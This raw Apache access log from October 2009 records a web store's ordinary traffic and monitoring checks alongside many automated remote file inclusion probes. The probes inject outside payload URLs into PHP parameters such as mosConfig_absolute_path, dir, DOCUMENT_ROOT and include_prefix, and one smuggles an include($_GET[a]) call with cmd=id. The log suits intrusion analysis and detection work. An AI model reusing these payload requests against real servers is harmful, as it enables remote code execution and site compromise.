66.249.65.201 - - [28/Oct/2009:00:20:19 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L41744E4A4009C00019A9085+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
200.24.102.162 - - [28/Oct/2009:00:20:21 -0400] "GET /logs/access_log.Q109072500//bbs///skin/ggambo7002_board/setup.php?dir=http://www.dunkerquepromotion.org/xpl/idzim.txt?? HTTP/1.1" 404 263 "-" "libwww-perl/5.808"
200.24.102.162 - - [28/Oct/2009:00:20:22 -0400] "GET //bbs///skin/ggambo7002_board/setup.php?dir=http://www.dunkerquepromotion.org/xpl/idzim.txt?? HTTP/1.1" 404 236 "-" "libwww-perl/5.808"
200.24.102.162 - - [28/Oct/2009:00:20:22 -0400] "GET /logs//bbs///skin/ggambo7002_board/setup.php?dir=http://www.dunkerquepromotion.org/xpl/idzim.txt?? HTTP/1.1" 404 241 "-" "libwww-perl/5.808"
130.13.166.92 - - [28/Oct/2009:00:20:34 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L118F275B1510F500825908H+M37+ENG HTTP/1.1" 200 76801 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L118F275811907500797908H+M37+ENG" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3"
130.13.166.92 - - [28/Oct/2009:00:20:36 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L118F275B1510F500825908H+M37+ENG" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3"
130.13.166.92 - - [28/Oct/2009:00:20:45 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L118F285411A0C5008A0908H+M37+ENG HTTP/1.1" 200 36070 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L118F275B1510F500825908H+M37+ENG" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3"
64.59.81.109 - - [28/Oct/2009:00:20:50 -0400] "GET /logs/access_log.Q109061900//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://triton.100free.com/cmd.txt?&cmd=id? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
200.24.102.162 - - [28/Oct/2009:00:20:51 -0400] "GET /logs/access_log.Q109072200//bbs///skin/ggambo7002_board/setup.php?dir=http://www.dunkerquepromotion.org/xpl/idzim.txt?? HTTP/1.1" 404 263 "-" "libwww-perl/5.808"
130.13.166.92 - - [28/Oct/2009:00:20:54 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L118F285411A0C5008A0908H+M37+ENG" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3"
130.13.166.92 - - [28/Oct/2009:00:21:09 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L118F285E1E5005008F9908H+M37+ENG HTTP/1.1" 200 37508 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L118F285411A0C5008A0908H+M37+ENG" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3"
130.13.166.92 - - [28/Oct/2009:00:21:15 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L118F285513D06500A18908H+M37+ENG HTTP/1.1" 200 77209 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L118F285E1E5005008F9908H+M37+ENG" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3"
130.13.166.92 - - [28/Oct/2009:00:21:28 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L118F285B14509500AE7908H+M37+ENG HTTP/1.1" 200 36932 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3"
200.24.102.162 - - [28/Oct/2009:00:22:02 -0400] "GET /logs/access_log.Q109072500//bbs///skin/ggambo7002_board/setup.php?dir=http://www.dunkerquepromotion.org/xpl/idzim.txt?? HTTP/1.1" 404 263 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
130.13.166.92 - - [28/Oct/2009:00:22:10 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L118F285716F0E500B06908H+M37+ENG HTTP/1.1" 200 40506 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L118F285B14509500AE7908H+M37+ENG" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3"
209.59.12.99 - - [28/Oct/2009:00:22:11 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
222.236.47.182 - - [28/Oct/2009:00:22:16 -0400] "GET //libraries/database.php?path=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
222.236.47.182 - - [28/Oct/2009:00:22:17 -0400] "GET /logs//libraries/database.php?path=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
130.13.166.92 - - [28/Oct/2009:00:22:17 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L118F285F1460D500D76908H+M37+ENG HTTP/1.1" 200 57420 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L118F285716F0E500B06908H+M37+ENG" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3"
62.140.23.192 - - [28/Oct/2009:00:22:42 -0400] "GET /logs/access_log.Q109072900/e404.php?DOCUMENT_ROOT=http://www.hochsauerlandferien.de/nw/data/images/id1.txt??? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
62.140.23.192 - - [28/Oct/2009:00:22:42 -0400] "GET /logs/e404.php?DOCUMENT_ROOT=http://www.hochsauerlandferien.de/nw/data/images/id1.txt??? HTTP/1.1" 404 211 "-" "Mozilla/5.0"
62.140.23.192 - - [28/Oct/2009:00:22:43 -0400] "GET /e404.php?DOCUMENT_ROOT=http://www.hochsauerlandferien.de/nw/data/images/id1.txt??? HTTP/1.1" 404 206 "-" "Mozilla/5.0"
62.140.23.192 - - [28/Oct/2009:00:22:45 -0400] "GET /logs/access_log.Q109090900/e404.php?DOCUMENT_ROOT=http://www.hochsauerlandferien.de/nw/data/images/id1.txt??? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
217.199.218.29 - - [28/Oct/2009:00:24:37 -0400] "GET /logs//bookmark4u/lostpasswd.php?env[include_prefix]=http://ea3.fileave.com/fx29id1.txt??? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
217.199.218.29 - - [28/Oct/2009:00:24:37 -0400] "GET /logs/access_log.Q109062300//bookmark4u/lostpasswd.php?env[include_prefix]=http://ea3.fileave.com/fx29id1.txt??? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
217.199.218.29 - - [28/Oct/2009:00:24:37 -0400] "GET //bookmark4u/lostpasswd.php?env[include_prefix]=http://ea3.fileave.com/fx29id1.txt??? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
62.140.23.192 - - [28/Oct/2009:00:24:38 -0400] "GET /logs/access_log.Q109072900/e404.php?DOCUMENT_ROOT=http://www.hochsauerlandferien.de/nw/data/images/id2.txt?%0D? HTTP/1.1" 404 233 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007"
62.140.23.192 - - [28/Oct/2009:00:24:38 -0400] "GET /e404.php?DOCUMENT_ROOT=http://www.hochsauerlandferien.de/nw/data/images/id2.txt?%0D? HTTP/1.1" 404 206 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007"
62.140.23.192 - - [28/Oct/2009:00:24:40 -0400] "GET /logs/e404.php?DOCUMENT_ROOT=http://www.hochsauerlandferien.de/nw/data/images/id2.txt?%0D? HTTP/1.1" 404 211 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007"
62.140.23.192 - - [28/Oct/2009:00:24:41 -0400] "GET /logs/access_log.Q109090900/e404.php?DOCUMENT_ROOT=http://www.hochsauerlandferien.de/nw/data/images/id2.txt?%0D? HTTP/1.1" 404 233 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007"
208.89.214.167 - - [28/Oct/2009:00:24:59 -0400] "GET /index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt??? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
208.89.214.167 - - [28/Oct/2009:00:24:59 -0400] "GET /logs/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt??? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
208.89.214.167 - - [28/Oct/2009:00:25:11 -0400] "GET /logs/access_log.Q109080200/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt??? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
220.181.7.57 - - [28/Oct/2009:00:25:38 -0400] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
69.72.215.82 - - [28/Oct/2009:00:26:26 -0400] "GET /logs/access_log.Q109071700//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.831"
69.72.215.82 - - [28/Oct/2009:00:26:26 -0400] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 249 "-" "libwww-perl/5.831"
69.72.215.82 - - [28/Oct/2009:00:26:26 -0400] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 254 "-" "libwww-perl/5.831"
69.72.215.82 - - [28/Oct/2009:00:26:26 -0400] "GET /logs/access_log.Q109071700//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.831"
69.72.215.82 - - [28/Oct/2009:00:26:26 -0400] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 249 "-" "libwww-perl/5.831"
69.72.215.82 - - [28/Oct/2009:00:26:26 -0400] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 254 "-" "libwww-perl/5.831"
93.93.131.94 - - [28/Oct/2009:00:26:41 -0400] "GET /logs/access_log.Q109071700//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.805"
93.93.131.94 - - [28/Oct/2009:00:26:41 -0400] "GET /logs/access_log.Q109071700//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.805"
93.93.131.94 - - [28/Oct/2009:00:26:41 -0400] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 249 "-" "libwww-perl/5.805"
93.93.131.94 - - [28/Oct/2009:00:26:41 -0400] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 249 "-" "libwww-perl/5.805"
93.93.131.94 - - [28/Oct/2009:00:26:41 -0400] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 254 "-" "libwww-perl/5.805"
93.93.131.94 - - [28/Oct/2009:00:26:41 -0400] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 254 "-" "libwww-perl/5.805"
69.72.215.82 - - [28/Oct/2009:00:26:42 -0400] "GET /logs/access_log.Q109072000//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.831"
69.72.215.82 - - [28/Oct/2009:00:26:42 -0400] "GET /logs/access_log.Q109072000//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.831"
93.93.131.94 - - [28/Oct/2009:00:26:50 -0400] "GET /logs/access_log.Q109071700//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.805"
93.93.131.94 - - [28/Oct/2009:00:26:51 -0400] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 249 "-" "libwww-perl/5.805"
93.93.131.94 - - [28/Oct/2009:00:26:51 -0400] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 254 "-" "libwww-perl/5.805"
93.93.131.94 - - [28/Oct/2009:00:26:54 -0400] "GET /logs/access_log.Q109072000//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.805"
93.93.131.94 - - [28/Oct/2009:00:26:54 -0400] "GET /logs/access_log.Q109072000//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.805"
93.93.131.94 - - [28/Oct/2009:00:27:06 -0400] "GET /logs/access_log.Q109072000//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.805"
72.55.143.249 - - [28/Oct/2009:00:27:10 -0400] "GET /logs/access_log.Q109052800%20%20//include/bbs.lib.inc.php?site_path=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/id1.txt? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
72.55.143.249 - - [28/Oct/2009:00:27:10 -0400] "GET /logs//include/bbs.lib.inc.php?site_path=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/id1.txt? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
72.55.143.249 - - [28/Oct/2009:00:27:10 -0400] "GET //include/bbs.lib.inc.php?site_path=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/id1.txt? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
209.59.12.99 - - [28/Oct/2009:00:27:16 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
72.55.143.249 - - [28/Oct/2009:00:27:20 -0400] "GET /logs/error_log.Q109052800%20%20//include/bbs.lib.inc.php?site_path=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/id1.txt? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
217.199.218.29 - - [28/Oct/2009:00:27:27 -0400] "GET /logs/access_log.Q109062300%20%20//bookmark4u/lostpasswd.php?env[include_prefix]=http://ea3.fileave.com/fx29id1.txt??? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
217.199.218.29 - - [28/Oct/2009:00:27:27 -0400] "GET /logs/error_log.Q109101800%20%20//bookmark4u/lostpasswd.php?env[include_prefix]=http://ea3.fileave.com/fx29id1.txt??? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
174.143.3.188 - - [28/Oct/2009:00:27:41 -0400] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=? HTTP/1.1" 404 245 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
174.143.3.188 - - [28/Oct/2009:00:27:41 -0400] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=? HTTP/1.1" 404 250 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)"
174.143.3.188 - - [28/Oct/2009:00:27:41 -0400] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://62.204.110.243/newscans.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
174.143.3.188 - - [28/Oct/2009:00:27:41 -0400] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://62.204.110.243/newscans.txt?? HTTP/1.1" 404 250 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)"
72.55.143.249 - - [28/Oct/2009:00:27:43 -0400] "GET /logs//include/bbs.lib.inc.php?site_path=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/id1.txt? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
72.55.143.249 - - [28/Oct/2009:00:27:43 -0400] "GET /logs/access_log.Q109052800//include/bbs.lib.inc.php?site_path=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/id1.txt? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
72.55.143.249 - - [28/Oct/2009:00:27:43 -0400] "GET //include/bbs.lib.inc.php?site_path=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/id1.txt? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
72.55.143.249 - - [28/Oct/2009:00:27:52 -0400] "GET /logs/error_log.Q109052800//include/bbs.lib.inc.php?site_path=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/id1.txt? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
62.140.23.192 - - [28/Oct/2009:00:29:45 -0400] "GET /logs/error_log.Q109072900/e404.php?DOCUMENT_ROOT=http://www.hochsauerlandferien.de/nw/data/images/id2.txt?%0D? HTTP/1.1" 404 232 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007"
61.47.7.71 - - [28/Oct/2009:00:29:50 -0400] "GET /logs//config/dbutil.bck.php?confdir=http://ea3.fileave.com/chid.txt??? HTTP/1.1" 404 225 "-" "libwww-perl/5.79"
61.47.7.71 - - [28/Oct/2009:00:29:50 -0400] "GET /logs/error_log.Q109081800//config/dbutil.bck.php?confdir=http://ea3.fileave.com/chid.txt??? HTTP/1.1" 404 246 "-" "libwww-perl/5.79"
61.47.7.71 - - [28/Oct/2009:00:29:50 -0400] "GET /logs/access_log.Q109090600//config/dbutil.bck.php?confdir=http://ea3.fileave.com/chid.txt??? HTTP/1.1" 404 247 "-" "libwww-perl/5.79"
61.47.7.71 - - [28/Oct/2009:00:29:50 -0400] "GET //config/dbutil.bck.php?confdir=http://ea3.fileave.com/chid.txt??? HTTP/1.1" 404 220 "-" "libwww-perl/5.79"
122.155.5.84 - - [28/Oct/2009:00:30:48 -0400] "GET /logs/error_log.Q109051900/?sourcedir=http://www.hyungs.net/bbs//data/zfxid1.txt? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
122.155.5.84 - - [28/Oct/2009:00:30:48 -0400] "GET /logs/access_log.Q109051900/?sourcedir=http://www.hyungs.net/bbs//data/zfxid1.txt? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
62.140.23.192 - - [28/Oct/2009:00:31:16 -0400] "GET /logs/error_log.Q109071800/e404.php?DOCUMENT_ROOT=http://www.hochsauerlandferien.de/nw/data/images/id2.txt?%0D? HTTP/1.1" 404 232 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007"
209.59.12.99 - - [28/Oct/2009:00:32:11 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
62.140.23.192 - - [28/Oct/2009:00:32:41 -0400] "GET /logs//galeria.php?start=0&kategoria=http://www.hochsauerlandferien.de/nw/data/images/id1.txt??? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
62.140.23.192 - - [28/Oct/2009:00:32:41 -0400] "GET /logs/access_log.Q109051800//galeria.php?start=0&kategoria=http://www.hochsauerlandferien.de/nw/data/images/id1.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
62.140.23.192 - - [28/Oct/2009:00:32:41 -0400] "GET //galeria.php?start=0&kategoria=http://www.hochsauerlandferien.de/nw/data/images/id1.txt??? HTTP/1.1" 404 210 "-" "Mozilla/5.0"
66.249.65.201 - - [28/Oct/2009:00:33:18 -0400] "GET /logs/error_log.Q108061400 HTTP/1.1" 404 223 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
62.140.23.192 - - [28/Oct/2009:00:34:09 -0400] "GET /logs/access_log.Q109051800//galeria.php?start=0&kategoria=http://www.hochsauerlandferien.de/nw/data/images/id2.txt?%0D? HTTP/1.1" 404 237 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007"
62.140.23.192 - - [28/Oct/2009:00:34:09 -0400] "GET //galeria.php?start=0&kategoria=http://www.hochsauerlandferien.de/nw/data/images/id2.txt?%0D? HTTP/1.1" 404 210 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007"
62.140.23.192 - - [28/Oct/2009:00:34:09 -0400] "GET /logs//galeria.php?start=0&kategoria=http://www.hochsauerlandferien.de/nw/data/images/id2.txt?%0D? HTTP/1.1" 404 215 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007"
61.47.7.71 - - [28/Oct/2009:00:34:24 -0400] "GET /logs/error_log.Q109081800%20//config/dbutil.bck.php?confdir=http://ea3.fileave.com/chid.txt??? HTTP/1.1" 404 247 "-" "libwww-perl/5.79"
62.140.23.192 - - [28/Oct/2009:00:34:31 -0400] "GET /logs/error_log.Q109071800//galeria.php?start=0&kategoria=http://www.hochsauerlandferien.de/nw/data/images/id2.txt?%0D? HTTP/1.1" 404 236 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007"
208.89.214.167 - - [28/Oct/2009:00:34:55 -0400] "GET /logs/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt??? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
62.140.23.192 - - [28/Oct/2009:00:34:59 -0400] "GET /logs/access_log.Q109071800%20%20//galeria.php?start=0&kategoria=http://www.hochsauerlandferien.de/nw/data/images/id1.txt??? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
208.89.214.167 - - [28/Oct/2009:00:35:00 -0400] "GET /logs/access_log.Q109080200/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt??? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
208.89.214.167 - - [28/Oct/2009:00:35:01 -0400] "GET /index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt??? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
66.249.65.200 - - [28/Oct/2009:00:35:21 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L41744E4A4079F0001FA9085+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
62.140.23.192 - - [28/Oct/2009:00:35:39 -0400] "GET /logs/access_log.Q109071800//galeria.php?start=0&kategoria=http://www.hochsauerlandferien.de/nw/data/images/id2.txt?%0D? HTTP/1.1" 404 237 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007"
209.59.12.99 - - [28/Oct/2009:00:37:10 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
174.143.3.188 - - [28/Oct/2009:00:37:21 -0400] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=? HTTP/1.1" 404 245 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4"
174.143.3.188 - - [28/Oct/2009:00:37:21 -0400] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=? HTTP/1.1" 404 250 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511"
174.143.3.188 - - [28/Oct/2009:00:37:21 -0400] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://62.204.110.243/newscans.txt?? HTTP/1.1" 404 245 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
174.143.3.188 - - [28/Oct/2009:00:37:21 -0400] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://62.204.110.243/newscans.txt?? HTTP/1.1" 404 250 "-" "Mozilla/3.0 (OS/2; U)"
210.237.1.131 - - [28/Oct/2009:00:39:25 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)"
210.237.1.131 - - [28/Oct/2009:00:39:25 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)"
210.237.1.131 - - [28/Oct/2009:00:39:29 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)"
210.237.1.131 - - [28/Oct/2009:00:39:29 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)"
110.45.147.248 - - [28/Oct/2009:00:40:28 -0400] "GET //skin/zero_vote/setup.php?dir=http://www.lovelynashville.com/vote/img/list_images/mawar.txt????? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
110.45.147.248 - - [28/Oct/2009:00:40:28 -0400] "GET /logs//skin/zero_vote/setup.php?dir=http://www.lovelynashville.com/vote/img/list_images/mawar.txt????? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
209.59.12.99 - - [28/Oct/2009:00:42:39 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
62.140.23.192 - - [28/Oct/2009:00:43:07 -0400] "GET /logs/access_log.Q109061800//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.hochsauerlandferien.de/nw/data/images/id1.txt??? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
